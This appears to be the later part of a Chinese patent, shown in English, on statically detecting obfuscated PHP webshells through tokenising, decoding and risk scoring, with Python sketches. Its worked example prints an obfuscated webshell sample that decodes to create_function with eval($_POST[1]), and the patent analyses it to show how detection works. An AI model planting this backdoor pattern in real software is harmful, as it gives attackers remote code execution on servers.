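            # S2226: everything up to the next ";" is the expression to evaluate
            j = i + 1
            while j < len(tokens) and tokens[j] != ("Operator", ";"):
                j += 1
            expression = "".join(value for _, value in tokens[i + 1:j])
            assignments.append((target, expression))
            i = j                          # resume the traversal at the ";"
        i += 1
    return assignments


if __name__ == "__main__":
    sample = [
        ("Variable", "$_uU"), ("Operator", "="), ("Identifier", "chr"),
        ("Operator", "("), ("Number", "99"), ("Operator", ")"), ("Operator", "."),
        ("Identifier", "chr"), ("Operator", "("), ("Number", "104"),
        ("Operator", ")"), ("Operator", ";"),
    ]
    print(find_assignments(sample))
```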
In the above code segment, when the first "=" is detected, the previously traversed Tokens[i-1] is obtained, and its value (i.e., $_uU) is recorded as the variable to be assigned in the assignment expression currently found. Then, the search continues for a Tokens[i+n] whose category is operator and whose value is ";", and the one or more Tokens between Tokens[i] and Tokens[i+n] (i.e., chr(99).chr(104).chr(114)) are recorded as the expression to be evaluated in the assignment expression currently found. By analogy, the above code segment is found to contain the assignment expressions shown in Table 2:
Table 2
Optionally, in step S24, restoring the direct call function and the original call function according to the variable functions and assignment expressions may include the following steps:
Step S241: Look up, in the preset transcoding rules, the direct call function that matches the variable function;
Step S242: Compute the value corresponding to the variable of each assignment expression, and establish a correspondence between the variable of each assignment expression and its value;
Step S243: Identify the original call function from the direct call function by using the preset transcoding rules and the correspondences.
As can be seen from Table 2, the expression to the right of "=" in the assignment expression "$_uU=chr(99).chr(104).chr(114)" is obtained by transcoding with ASCII codes (corresponding to the preset transcoding rule above). ASCII uses designated combinations of 7 or 8 binary bits to represent 128 or 256 possible characters. Standard ASCII, also called basic ASCII, uses 7 binary bits to represent all uppercase and lowercase letters, the digits 0 to 9, punctuation marks, and the special control characters used in American English (note the difference in bit width: standard ASCII is a 7-bit representation). Looking up the characters (or functions/descriptions) that correspond to the decimal codes shows that chr(99) corresponds to the lowercase letter "c", chr(104) to the lowercase letter "h", and chr(114) to the lowercase letter "r". Therefore, in this assignment expression, the value of the expression corresponding to the variable $_uU is chr. Similarly, in the assignment expression $_fF=$_uU(99).$_uU(114).$_uU(101).$_uU(97).$_uU(116).$_uU(101).$_uU(95).$_uU(102).$_uU(117).$_uU(110).$_uU(99).$_uU(116).$_uU(105).$_uU(111).$_uU(110), the value of the expression corresponding to the variable $_fF is create_function. In the assignment expression $_cC=$_uU(101).$_uU(118).$_uU(97).$_uU(108).$_uU(40).$_uU(36).$_uU(95).$_uU(80).$_uU(79).$_uU(83).$_uU(84).$_uU(91).$_uU(49).$_uU(93).$_uU(41).$_uU(59), the value of the expression corresponding to the variable $_cC is eval($_POST[1]) followed by a semicolon (code 59). Finally, in the assignment expression $_=$_fF("",$_cC), the value of the expression corresponding to the variable $_ is create_function("", eval($_POST[1])).
Through the above analysis, a correspondence can be established between the variable of each assignment expression and its value. Next, from the assignment expression "$_uU=chr(99).chr(104).chr(114)", the direct call function chr can be restored according to the ASCII transcoding rule. Then, according to the ASCII transcoding rule and the established correspondences between variables and expression values, backtracking proceeds step by step ($_ → $_fF, $_cC → $_uU) until the original call function create_function("", eval($_POST[1])) is obtained. Here, create_function("", eval($_POST[1])) creates a function whose body is eval($_POST[1]), which executes code submitted in an HTTP POST request. It is therefore evident that create_function("", eval($_POST[1])) has malicious webshell properties.
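The restoration and backtracking described above can be sketched as follows, in Python for illustration. The sketch assumes the only transcoding rule is ASCII decoding through chr, and that each expression to be evaluated is either a chain of NAME(N) calls joined by "." or a call whose variables have already been resolved. The names `evaluate_chain`, `restore`, and `substitute` are hypothetical.

```python
import re

CALL = re.compile(r"(\$?\w+)\((\d+)\)")   # NAME(N), NAME may be a variable
VARIABLE = re.compile(r"\$\w+")


def evaluate_chain(expression, values):
    """Decode NAME(N).NAME(N)... where NAME is chr or a variable whose value is chr."""
    chars = []
    for name, code in CALL.findall(expression):
        function = values.get(name, name)  # backtrack a variable to its value
        if function != "chr":
            raise ValueError(f"no transcoding rule for {function}")
        chars.append(chr(int(code)))       # ASCII transcoding rule
    return "".join(chars)


def restore(assignments):
    """Build the variable -> value correspondence, in source order."""
    values = {}
    for variable, expression in assignments:
        values[variable] = evaluate_chain(expression, values)
    return values


def substitute(call, values):
    """Replace every resolved variable in a call with its recorded value."""
    return VARIABLE.sub(lambda m: values.get(m.group(), m.group()), call)


if __name__ == "__main__":
    codes_cc = [101, 118, 97, 108, 40, 36, 95, 80, 79, 83, 84, 91, 49, 93, 41, 59]
    codes_ff = [99, 114, 101, 97, 116, 101, 95, 102, 117, 110, 99, 116, 105, 111, 110]
    assignments = [
        ("$_uU", "chr(99).chr(104).chr(114)"),
        ("$_cC", ".".join(f"$_uU({c})" for c in codes_cc)),
        ("$_fF", ".".join(f"$_uU({c})" for c in codes_ff)),
    ]
    values = restore(assignments)
    print(values)
    print(substitute('$_fF("",$_cC)', values))
```

Resolving $_uU first matters: the later chains can only be decoded once $_uU is known to stand for chr, which is the backtracking order the text describes.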
Optionally, in step S26, assessing the security of the code file by the safety coefficient corresponding to the direct call function and the safety coefficient corresponding to the original call function may include the following steps:
Step S262: Read, from a preset storage area, the safety coefficient corresponding to the direct call function and the safety coefficient corresponding to the original call function;
Step S264: Sum the safety coefficient corresponding to the direct call function and the safety coefficient corresponding to the original call function to obtain the security assessment result.
A comprehensive assessment based on the preset safety coefficient (for example, a preset risk score or security score) corresponding to the direct call function chr and the preset safety coefficient corresponding to the original call function create_function("", eval($_POST[1])) determines the danger level of the code file (for example, ordinary, moderate, or high). For example, if the risk score corresponding to the direct call function chr is 1 point and the risk score corresponding to the original call function create_function("", eval($_POST[1])) is 3 points, the resulting security assessment result is 4 points. The assessment thus determines that the above code segment is a high-risk malicious webshell file.
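The summation in steps S262 and S264 can be sketched as follows, in Python for illustration. The two scores are the ones used in the example above; the table name `SAFETY_COEFFICIENTS`, the function name `assess`, and the thresholds separating the danger levels are assumptions made for this sketch, since the source only states that a total of 4 points is rated high risk.

```python
# Preset storage area, modelled here as a dictionary (scores from the example).
SAFETY_COEFFICIENTS = {
    "chr": 1,               # direct call function
    "create_function": 3,   # original call function
}

# Hypothetical thresholds: the source does not say where the levels begin.
LEVELS = [(4, "high"), (2, "moderate"), (0, "ordinary")]


def assess(direct_call, original_call, table=SAFETY_COEFFICIENTS):
    """Sum the two coefficients (S264) and map the total to a danger level."""
    total = table.get(direct_call, 0) + table.get(original_call, 0)   # S262 + S264
    for threshold, level in LEVELS:
        if total >= threshold:
            return total, level
    return total, "ordinary"


if __name__ == "__main__":
    print(assess("chr", "create_function"))
```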
In addition, in the operating environment shown in Fig. 1, the present application also provides another method for assessing code file security, as shown in Fig. 3. Fig. 3 is a flowchart of another method for assessing code file security according to an embodiment of the present invention. As shown in Fig. 3, the method may include the following processing steps:
Step S32: Parse the variable functions from the code file to be detected;
Step S34: Restore the direct call function according to the variable functions;
Step S36: Assess the security of the code file by the preset safety coefficient corresponding to the direct call function.
The code file to be detected may or may not contain assignment expressions. For a PHP code file that contains no assignment expressions, the assessment is relatively simple: the direct call function is restored from the PHP code file mainly according to the preset transcoding rules (for example, the ASCII transcoding rule), and the security of the code file is then assessed by the preset safety coefficient corresponding to the direct call function.
In a preferred implementation, the lexical analyzer, which may draw on Lua's lexer library and on the lexical analysis of PHP's Zend module, uses regular-expression matching to extract identifiers, comments, numbers, PHP keywords, variables, operators, and special characters from the source program in the code file, and then extracts all Tokens from the original code file in order of appearance to form a Tokens array. The variable functions are then parsed from the Tokens array.
The variable functions are parsed from the Tokens array in the same way as in steps S2221 to S2223 described above. Each Token is traversed in the preset order; for each Tokens[i] whose category is operator and whose value is a left parenthesis, the category of Tokens[i-1] is checked; if it is variable, the search continues for the Tokens[i+n] whose category is operator and whose value is a right parenthesis, and the function is recorded as a variable function when the parameter set between the two parentheses matches the preset regular expression. The same parameter rule applies: a parameter in which $ appears together with letters, digits, or underscores must begin with $ (for example, $_POST['aaa'], but not a$b).
It should be noted that, for brevity, each of the foregoing method embodiments is described as a series of combined actions. Those skilled in the art should understand, however, that the present invention is not limited by the described order of actions, because according to the present invention some steps may be performed in another order or simultaneously. Those skilled in the art should also understand that the embodiments described in this specification are preferred embodiments, and the actions and modules involved are not necessarily required by the present invention.
Through the above description of the embodiments, those skilled in the art can clearly understand that the method for assessing code file security according to the above embodiments can be implemented by software plus the necessary general-purpose hardware platform, or of course by hardware, although in many cases the former is the better implementation. Based on this understanding, the technical solution of the present invention, in essence or in the part that contributes to the prior art, can be embodied in the form of a software product. The computer software product is stored in a storage medium (such as ROM/RAM, a magnetic disk, or an optical disc) and includes several instructions that cause a terminal device (which may be a mobile phone, a computer, a server, a network device, or the like) to perform the methods described in the embodiments of the present invention.
Embodiment 2
According to an embodiment of the present invention, a device embodiment for implementing the above method for assessing code file security is also provided. Fig. 4 is a structural block diagram of a device for assessing code file security according to an embodiment of the present invention. As shown in Fig. 4, the device includes: a parsing module 10, configured to parse variable functions and assignment expressions from the code file to be detected; a restoring module 20, configured to restore the direct call function and the original call function according to the variable functions and assignment expressions; and an evaluation module 30, configured to assess the security of the code file by the preset safety coefficient corresponding to the direct call function and the preset safety coefficient corresponding to the original call function.
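The three-module structure can be pictured as a simple pipeline. The following Python sketch is only an illustration of how the modules hand results to one another; the class name `AssessmentDevice` and the callable-based interfaces are assumptions, and the stand-in modules in the usage example do no real parsing.

```python
from dataclasses import dataclass
from typing import Any, Callable


@dataclass
class AssessmentDevice:
    parse: Callable[[str], Any]       # parsing module 10
    restore: Callable[[Any], Any]     # restoring module 20
    evaluate: Callable[[Any], int]    # evaluation module 30

    def assess(self, code: str) -> int:
        """Feed the code file through the three modules in order."""
        parsed = self.parse(code)
        restored = self.restore(parsed)
        return self.evaluate(restored)


if __name__ == "__main__":
    # Stand-in modules, used only to show the data flow.
    device = AssessmentDevice(
        parse=lambda code: code.split(";"),
        restore=lambda parts: [p for p in parts if p],
        evaluate=len,
    )
    print(device.assess("a;b;"))
```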
The technical solution provided by the embodiments of the present invention can be applied to static webshell detection for PHP scripts. The code file written in PHP is parsed (including lexical analysis and semantic analysis), and the variable functions spliced together from character strings are restored. Code backtracking is then carried out on the basis of the restored direct call function and the assignment expressions in the code file until the original call function is restored, in order to determine whether the code file contains functions commonly used by webshells or dangerous functions. The security of the code file is then assessed by the preset safety coefficient corresponding to the direct call function (for example, the danger level of the commonly used or dangerous function) and the preset safety coefficient corresponding to the original call function, to determine whether the code file is a webshell file maliciously uploaded by an intruder (or attacker).
Optionally, Fig. 5 is a structural block diagram of a device for assessing code file security according to a preferred embodiment of the present invention. As shown in Fig. 5, the parsing module 10 may include: a converting unit 100, configured to perform lexical analysis on the code file and convert the character strings in the code file into a Token sequence; and a parsing unit 102, configured to parse the variable functions and assignment expressions from the Token sequence.
Optionally, the parsing unit 102 may include: a first searching subunit (not shown), configured to traverse each Token in the Token sequence in a preset order and look for a first Token whose category is operator and whose value is a left parenthesis; a judging subunit (not shown), configured to determine, when the first Token is found, whether the category of the previously traversed Token adjacent to the first Token is variable; and a first parsing subunit (not shown), configured to, when the output of the judging subunit is yes, search onward from the first Token for a second Token whose category is operator and whose value is a right parenthesis, record the function currently found as a variable function if the parameter set between the first Token and the second Token matches a preset regular expression, and return to the first searching subunit until all variable functions have been parsed.
These subunits operate as described above for steps S2221 to S2223. Each Token in the Tokens array is traversed in the preset order; for each Tokens[i] whose category is operator and whose value is a left parenthesis, the category of Tokens[i-1] is checked; if it is variable, the search continues for the Tokens[i+n] whose category is operator and whose value is a right parenthesis, and the function is recorded as a variable function when the parameter set between the two parentheses matches the preset regular expression. A parameter in which $ appears together with letters, digits, or underscores must begin with $ (for example, $_POST['aaa'], but not a$b).
Optionally, the parsing unit 102 may include: a second searching subunit (not shown), configured to traverse each Token in the Token sequence in a preset order and look for a third Token whose category is operator and whose value is an equals sign; an obtaining subunit (not shown), configured to obtain, when the third Token is found, the previously traversed Token adjacent to the third Token and record the value of the obtained Token as the variable to be assigned in the assignment expression currently found; and a second parsing subunit (not shown), configured to search onward from the third Token for a fourth Token whose category is operator and whose value is a semicolon, obtain the one or more Tokens between the third Token and the fourth Token, record them as the expression to be evaluated in the assignment expression currently found, and return to the second searching subunit until all assignment expressions have been parsed.
These subunits operate as described above for steps S2224 to S2226. Each Token in the Tokens array is traversed in the preset order; for each Tokens[i] whose category is operator and whose value is an equals sign, the value of Tokens[i-1] is recorded as the variable to be assigned; the search then continues for the Tokens[i+n] whose category is operator and whose value is a semicolon (n being a positive integer), and the one or more Tokens between Tokens[i] and Tokens[i+n] are recorded as the expression to be evaluated in the assignment expression currently found.
Optionally, as shown in Fig. 5, the restoring module 20 may include: a first restoring unit 200, configured to look up, in the preset transcoding rules, the direct call function that matches the variable function; a processing unit 202, configured to compute the value corresponding to the variable of each assignment expression and establish a correspondence between the variable of each assignment expression and its value; and a second restoring unit 204, configured to identify the original call function from the direct call function by using the preset transcoding rules and the correspondences.
Optionally, as shown in Fig. 5, the evaluation module 30 may include: a reading unit 300, configured to read, from a preset storage area, the safety coefficient corresponding to the direct call function and the safety coefficient corresponding to the original call function; and a calculating unit 302, configured to sum the safety coefficient corresponding to the direct call function and the safety coefficient corresponding to the original call function to obtain the security assessment result.
According to an embodiment of the present invention, another device embodiment for implementing the above method for assessing code file security is also provided. Fig. 6 is a structural block diagram of another device for assessing code file security according to an embodiment of the present invention. As shown in Fig. 6, the device includes: a parsing module 40, configured to parse variable functions from the code file to be detected; a restoring module 50, configured to restore the direct call function according to the variable functions; and an evaluation module 60, configured to assess the security of the code file by the preset safety coefficient corresponding to the direct call function.
The code file to be detected may or may not contain assignment expressions. For a PHP code file that contains no assignment expressions, the assessment is relatively simple: the direct call function is restored from the PHP code file mainly according to the preset transcoding rules (for example, the ASCII transcoding rule), and the security of the code file is then assessed by the preset safety coefficient corresponding to the direct call function.
Embodiment 3
An embodiment of the present invention may provide a computer terminal, which may be any computer terminal in a group of computer terminals. Optionally, in this embodiment, the computer terminal may also be replaced by a terminal device such as a mobile terminal.
Optionally, in this embodiment, the computer terminal may be located in at least one of a plurality of network devices of a computer network.
Optionally, Fig. 7 is a structural block diagram of a computer terminal according to an embodiment of the present invention. As shown in Fig. 7, the computer terminal may include one or more processors (only one is shown in the figure) and a memory.
The memory can be used to store software programs and modules, such as the program instructions/modules corresponding to the method and device for assessing code file security in the embodiments of the present invention. By running the software programs and modules stored in the memory, the processor performs various functional applications and data processing, that is, implements the above method for assessing code file security. The memory may include high-speed random access memory and may also include non-volatile memory, such as one or more magnetic storage devices, flash memory, or other non-volatile solid-state memory. In some examples, the memory may further include memory located remotely from the processor, and such remote memory may be connected to the terminal through a network. Examples of such networks include, but are not limited to, the Internet, intranets, local area networks, mobile communication networks, and combinations thereof.
The processor may call, through a transmission device, the information and application programs stored in the memory to perform the following steps:
S1: Parse the variable functions and assignment expressions from the code file to be detected;
S2: Restore the direct call function and the original call function according to the variable functions and assignment expressions;
S3: Assess the security of the code file by the preset safety coefficient corresponding to the direct call function and the preset safety coefficient corresponding to the original call function.
Optionally, the processor may also execute program code for the following steps: performing lexical analysis on the code file to convert the character strings in the code file into a Token sequence; and parsing the variable functions and assignment expressions from the Token sequence.
Optionally, the processor may also execute program code for the following steps. Searching step: traverse each Token in the Token sequence in a preset order, and look for a first Token whose category is operator and whose value is a left parenthesis. Judging step: when the first Token is found, determine whether the category of the previously traversed Token adjacent to the first Token is variable. If so, search onward from the first Token for a second Token whose category is operator and whose value is a right parenthesis; if the parameter set between the first Token and the second Token matches a preset regular expression, record the function currently found as a variable function, and return to the searching step until all variable functions have been parsed.
Optionally, the processor may also execute program code for the following steps. Searching step: traverse each Token in the Token sequence in a preset order, and look for a third Token whose category is operator and whose value is an equals sign. Obtaining step: when the third Token is found, obtain the previously traversed Token adjacent to the third Token, and record the value of the obtained Token as the variable to be assigned in the assignment expression currently found. Then search onward from the third Token for a fourth Token whose category is operator and whose value is a semicolon, obtain the one or more Tokens between the third Token and the fourth Token, record them as the expression to be evaluated in the assignment expression currently found, and return to the searching step until all assignment expressions have been parsed.
Optionally, the processor may also execute program code for the following steps: looking up, in the preset transcoding rules, the direct call function that matches the variable function; computing the value corresponding to the variable of each assignment expression, and establishing a correspondence between the variable of each assignment expression and its value; and identifying the original call function from the direct call function by using the preset transcoding rules and the correspondences.
Optionally, the processor may also execute program code for the following steps: reading, from a preset storage area, the safety coefficient corresponding to the direct call function and the safety coefficient corresponding to the original call function; and summing the two safety coefficients to obtain the security assessment result.
As another embodiment of the present invention, the processor may also call, through the transmission device, the information and application programs stored in the memory to perform the following steps:
S1: Parse a variable function from the code file to be detected;
S2: Restore a directly invoked function according to the variable function;
S3: Assess the security of the code file by means of a preset safety coefficient corresponding to the directly invoked function.
With the embodiments of the present invention, variable functions and assignment expressions are parsed from the code file to be detected, the directly invoked function and the original call function are restored according to the variable functions and assignment expressions, and the security of the code file is assessed by means of the preset safety coefficient corresponding to the directly invoked function and the preset safety coefficient corresponding to the original call function. This achieves the technical effect of improving the detection efficiency for variable-function-type webshell code files and the accuracy of the detection results, and thereby solves the technical problem that the security detection schemes for webshell code files provided in the related art have low detection efficiency and low accuracy.
A person of ordinary skill in the art will appreciate that the structure shown in Fig. 7 is only illustrative. The terminal may also be a smartphone (such as an Android phone or an iOS phone), a tablet computer, a palmtop computer, a Mobile Internet Device (MID), a PAD, or a similar terminal device. Fig. 7 does not limit the structure of the above electronic device. For example, the terminal may include more or fewer components than shown in Fig. 7 (such as a network interface or a display device), or have a configuration different from that shown in Fig. 7.
A person of ordinary skill in the art will appreciate that all or some of the steps in the methods of the above embodiments can be completed by a program instructing hardware related to the terminal device. The program can be stored in a computer-readable storage medium, which may include a flash disk, read-only memory (ROM), random access memory (RAM), a magnetic disk, an optical disc, and the like.
Embodiment 4
Embodiments of the present invention also provide a storage medium. Optionally, in this embodiment, the storage medium may be used to store the program code executed by the method for assessing code file security provided in Embodiment 1.
Optionally, in this embodiment, the storage medium may be located in any computer terminal of a computer terminal group in a computer network, or in any mobile terminal of a mobile terminal group.
Optionally, in this embodiment, the storage medium is configured to store program code for performing the following steps:
S1: Parse a variable function and an assignment expression from the code file to be detected;
S2: Restore a directly invoked function and an original call function according to the variable function and the assignment expression;
S3: Assess the security of the code file by means of a preset safety coefficient corresponding to the directly invoked function and a preset safety coefficient corresponding to the original call function.
Optionally, the storage medium is further configured to store program code for performing the following steps: performing lexical analysis on the code file to convert the character string in the code file into a Token sequence; and parsing the variable function and the assignment expression from the Token sequence.
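To make the lexical analysis step concrete, the following is a minimal Python sketch of converting a character string into a Token sequence. The token categories, the regular expressions in _TOKEN_SPEC, and the name tokenize are assumptions of this sketch; it covers only a small PHP-like subset and is not the lexer used by the source.

```python
import re
from typing import List, NamedTuple


class Token(NamedTuple):
    category: str
    value: str


# Hypothetical token categories for a small PHP-like subset.
_TOKEN_SPEC = [
    ("variable", r"\$[A-Za-z_]\w*"),
    ("string", r"'(?:[^'\\]|\\.)*'|\"(?:[^\"\\]|\\.)*\""),
    ("number", r"\d+"),
    ("identifier", r"[A-Za-z_]\w*"),
    ("operator", r"[()=;.,\[\]]"),
    ("skip", r"\s+"),
]
_TOKEN_RE = re.compile("|".join(f"(?P<{n}>{p})" for n, p in _TOKEN_SPEC))


def tokenize(source: str) -> List[Token]:
    """Convert a character string into a list of (category, value) Tokens."""
    tokens = []
    pos = 0
    while pos < len(source):
        match = _TOKEN_RE.match(source, pos)
        if match is None:
            # Characters outside the subset are kept as single 'other' Tokens.
            tokens.append(Token("other", source[pos]))
            pos += 1
            continue
        if match.lastgroup != "skip":  # whitespace is dropped
            tokens.append(Token(match.lastgroup, match.group()))
        pos = match.end()
    return tokens
```

The resulting list preserves source order, so later steps can traverse it and inspect the Token adjacent to a parenthesis or an equals sign.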
Optionally, the storage medium is further configured to store program code for performing the following steps. Search step: traverse each Token in the Token sequence in a preset order, and search for a first Token whose category is operator and whose value is a left parenthesis. Judgment step: when the first Token is found, determine whether the category of the previously traversed Token adjacent to the first Token is variable. If so, search onward from the first Token for a second Token whose category is operator and whose value is a right parenthesis; when the parameter set between the first Token and the second Token matches a preset regular expression, record the currently found function as a variable function. Then return to the search step, until the variable functions have been parsed.
Optionally, the storage medium is further configured to store program code for performing the following steps. Search step: traverse each Token in the Token sequence in a preset order, and search for a third Token whose category is operator and whose value is an equals sign. Obtaining step: when the third Token is found, obtain the previously traversed Token adjacent to the third Token, and record the value of the obtained Token as the variable to be assigned in the currently found assignment expression. Then search onward from the third Token for a fourth Token whose category is operator and whose value is a semicolon, obtain the one or more Tokens between the third Token and the fourth Token, and record them as the expression to be evaluated in the currently found assignment expression. Then return to the search step, until the assignment expressions have been parsed.
Optionally, the storage medium is further configured to store program code for performing the following steps: looking up, in preset transcoding rules, the directly invoked function that matches the variable function; calculating the value corresponding to the variable of each assignment expression, and establishing a correspondence between the variable of each assignment expression and its value; and using the preset transcoding rules and the correspondence to identify the original call function from the directly invoked function.
Optionally, the storage medium is further configured to store program code for performing the following steps: reading, from a preset storage area, the safety coefficient corresponding to the directly invoked function and the safety coefficient corresponding to the original call function; and summing the safety coefficient corresponding to the directly invoked function and the safety coefficient corresponding to the original call function to obtain the security assessment result.
Optionally, in an alternative scheme of this embodiment, the storage medium is configured to store program code for performing the following steps:
S1: Parse a variable function from the code file to be detected;
S2: Restore a directly invoked function according to the variable function;
S3: Assess the security of the code file by means of a preset safety coefficient corresponding to the directly invoked function.
The numbering of the above embodiments of the present invention is for description only and does not indicate the relative merits of the embodiments.
In the above embodiments of the present invention, the description of each embodiment has its own emphasis. For parts not described in detail in one embodiment, refer to the related descriptions of the other embodiments.
In the several embodiments provided in this application, it should be understood that the disclosed technical content may be implemented in other ways. The device embodiments described above are merely illustrative. For example, the division into units is only a division by logical function, and other divisions are possible in an actual implementation: multiple units or components may be combined or integrated into another system, or some features may be omitted or not performed. In addition, the mutual coupling, direct coupling, or communication connection shown or discussed may be indirect coupling or communication connection through some interfaces, units, or modules, and may be electrical or take other forms.
The units described as separate components may or may not be physically separate, and the components shown as units may or may not be physical units; that is, they may be located in one place or distributed over multiple network units. Some or all of the units may be selected according to actual needs to achieve the purpose of the solution of this embodiment.
In addition, the functional units in the embodiments of the present invention may be integrated into one processing unit, each unit may exist physically on its own, or two or more units may be integrated into one unit. The integrated unit may be implemented in the form of hardware or in the form of a software functional unit.
If the integrated unit is implemented in the form of a software functional unit and sold or used as an independent product, it may be stored in a computer-readable storage medium. Based on this understanding, the technical solution of the present invention in essence, or the part that contributes to the prior art, or all or part of the technical solution, may be embodied in the form of a software product. The computer software product is stored in a storage medium and includes several instructions for causing a computer device (which may be a personal computer, a server, a network device, or the like) to perform all or some of the steps of the methods described in the embodiments of the present invention. The aforementioned storage medium includes various media that can store program code, such as a USB flash drive, read-only memory (ROM), random access memory (RAM), a removable hard disk, a magnetic disk, or an optical disc.
The above are only preferred embodiments of the present invention. It should be noted that a person of ordinary skill in the art may make several improvements and refinements without departing from the principles of the present invention, and these improvements and refinements shall also be regarded as falling within the protection scope of the present invention.

Claims (14)

  1. A method for assessing code file security, characterized by comprising:
    parsing a variable function and an assignment expression from a code file to be detected;
    restoring a directly invoked function and an original call function according to the variable function and the assignment expression;
    assessing the security of the code file by means of a preset safety coefficient corresponding to the directly invoked function and a preset safety coefficient corresponding to the original call function.
  2. The method according to claim 1, characterized in that parsing the variable function and the assignment expression from the code file comprises:
    performing lexical analysis on the code file to convert the character string in the code file into a Token sequence;
    parsing the variable function and the assignment expression from the Token sequence.
  3. The method according to claim 2, characterized in that parsing the variable function from the Token sequence comprises:
    a search step: traversing each Token in the Token sequence in a preset order, and searching for a first Token whose category is operator and whose value is a left parenthesis;
    a judgment step: when the first Token is found, determining whether the category of the previously traversed Token adjacent to the first Token is variable;
    if so, searching onward from the first Token for a second Token whose category is operator and whose value is a right parenthesis, and, when the parameter set between the first Token and the second Token matches a preset regular expression, recording the currently found function as a variable function and returning to the search step, until the variable function has been parsed.
  4. The method according to claim 2, characterized in that parsing the assignment expression from the Token sequence comprises:
    a search step: traversing each Token in the Token sequence in a preset order, and searching for a third Token whose category is operator and whose value is an equals sign;
    an obtaining step: when the third Token is found, obtaining the previously traversed Token adjacent to the third Token, and recording the value of the obtained Token as the variable to be assigned in the currently found assignment expression;
    searching onward from the third Token for a fourth Token whose category is operator and whose value is a semicolon, obtaining the one or more Tokens between the third Token and the fourth Token, recording the one or more Tokens as the expression to be evaluated in the currently found assignment expression, and returning to the search step, until the assignment expression has been parsed.
  5. The method according to any one of claims 1 to 4, characterized in that restoring the directly invoked function and the original call function according to the variable function and the assignment expression comprises:
    looking up, in preset transcoding rules, the directly invoked function that matches the variable function;
    calculating the value corresponding to the variable of each assignment expression among the assignment expressions, and establishing a correspondence between the variable of each assignment expression and its value;
    identifying the original call function from the directly invoked function by using the preset transcoding rules and the correspondence.
  6. The method according to claim 1, characterized in that assessing the security of the code file by means of the safety coefficient corresponding to the directly invoked function and the safety coefficient corresponding to the original call function comprises:
    reading, from a preset storage area, the safety coefficient corresponding to the directly invoked function and the safety coefficient corresponding to the original call function;
    summing the safety coefficient corresponding to the directly invoked function and the safety coefficient corresponding to the original call function to obtain a security assessment result.
  7. A method for assessing code file security, characterized by comprising:
    parsing a variable function from a code file to be detected;
    restoring a directly invoked function according to the variable function;
    assessing the security of the code file by means of a preset safety coefficient corresponding to the directly invoked function.
  8. A device for assessing code file security, characterized by comprising:
    a parsing module, configured to parse a variable function and an assignment expression from a code file to be detected;
    a restoration module, configured to restore a directly invoked function and an original call function according to the variable function and the assignment expression;
    an assessment module, configured to assess the security of the code file by means of a preset safety coefficient corresponding to the directly invoked function and a preset safety coefficient corresponding to the original call function.
  9. The device according to claim 8, characterized in that the parsing module comprises:
    a conversion unit, configured to perform lexical analysis on the code file and convert the character sequence in the code file into a Token sequence;
    a parsing unit, configured to parse the variable function and the assignment expression from the Token sequence.
  10. The device according to claim 9, characterized in that the parsing unit comprises:
    a first search subunit, configured to traverse each Token in the Token sequence in a preset order and search for a first Token whose category is operator and whose value is a left parenthesis;
    a judgment subunit, configured to determine, when the first Token is found, whether the category of the previously traversed Token adjacent to the first Token is variable;
    a first parsing subunit, configured to, when the output of the judgment subunit is yes, search onward from the first Token for a second Token whose category is operator and whose value is a right parenthesis, and, when the parameter set between the first Token and the second Token matches a preset regular expression, record the currently found function as a variable function and return to the first search subunit, until the variable function has been parsed.
  11. The device according to claim 9, characterized in that the parsing unit comprises:
    a second search subunit, configured to traverse each Token in the Token sequence in a preset order and search for a third Token whose category is operator and whose value is an equals sign;
    an obtaining subunit, configured to, when the third Token is found, obtain the previously traversed Token adjacent to the third Token and record the value of the obtained Token as the variable to be assigned in the currently found assignment expression;
    a second parsing subunit, configured to search onward from the third Token for a fourth Token whose category is operator and whose value is a semicolon, obtain the one or more Tokens between the third Token and the fourth Token, record the one or more Tokens as the expression to be evaluated in the currently found assignment expression, and return to the second search subunit, until the assignment expression has been parsed.
  12. The device according to any one of claims 8 to 11, characterized in that the restoration module comprises:
    a first restoration unit, configured to look up, in preset transcoding rules, the directly invoked function that matches the variable function;
    a processing unit, configured to calculate the value corresponding to the variable of each assignment expression among the assignment expressions, and establish a correspondence between the variable of each assignment expression and its value;
    a second restoration unit, configured to identify the original call function from the directly invoked function by using the preset transcoding rules and the correspondence.
  13. The device according to claim 8, characterized in that the assessment module comprises:
    a reading unit, configured to read, from a preset storage area, the safety coefficient corresponding to the directly invoked function and the safety coefficient corresponding to the original call function;
    a computing unit, configured to sum the safety coefficient corresponding to the directly invoked function and the safety coefficient corresponding to the original call function to obtain a security assessment result.
  14. A device for assessing code file security, characterized by comprising:
    a parsing module, configured to parse a variable function from a code file to be detected;
    a restoration module, configured to restore a directly invoked function according to the variable function;
    an assessment module, configured to assess the security of the code file by means of a preset safety coefficient corresponding to the directly invoked function.
CN201610282740.8A 2016-04-29 2016-04-29 Method and device for evaluating security of code file Active CN107341399B (en)

Priority Applications (1)

Application Number Priority Date Filing Date Title
CN201610282740.8A CN107341399B (en) 2016-04-29 2016-04-29 Method and device for evaluating security of code file

Publications (2)

Publication Number Publication Date
CN107341399A true CN107341399A (en) 2017-11-10
CN107341399B CN107341399B (en) 2020-09-04

Family

ID=60221962

Family Applications (1)

Application Number Title Priority Date Filing Date
CN201610282740.8A Active CN107341399B (en) 2016-04-29 2016-04-29 Method and device for evaluating security of code file

Country Status (1)

Country Link
CN (1) CN107341399B (en)

Cited By (11)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN108459962A (en) * 2018-01-23 2018-08-28 平安普惠企业管理有限公司 Code specification detection method, device, terminal device and storage medium
CN108959071A (en) * 2018-06-14 2018-12-07 湖南鼎源蓝剑信息科技有限公司 A kind of detection method and system of the PHP deformation webshell based on RASP
CN109408113A (en) * 2018-09-03 2019-03-01 平安普惠企业管理有限公司 A kind of code text processing method, system and terminal device
CN109660499A (en) * 2018-09-13 2019-04-19 阿里巴巴集团控股有限公司 It attacks hold-up interception method and device, calculate equipment and storage medium
CN110413284A (en) * 2019-08-06 2019-11-05 腾讯科技(深圳)有限公司 Morphology analysis methods, device, computer equipment and storage medium
CN110795731A (en) * 2019-10-09 2020-02-14 新华三信息安全技术有限公司 Page detection method and device
CN111368304A (en) * 2020-03-31 2020-07-03 绿盟科技集团股份有限公司 Malicious sample category detection method, device and equipment
CN112800427A (en) * 2021-04-08 2021-05-14 北京邮电大学 Webshell detection method and device, electronic equipment and storage medium
CN113032779A (en) * 2021-02-04 2021-06-25 中国科学院软件研究所 Multi-behavior joint matching method and device based on behavior parameter Boolean expression rule
CN114006706A (en) * 2020-07-13 2022-02-01 深信服科技股份有限公司 Network security detection method, system, computer device and readable storage medium
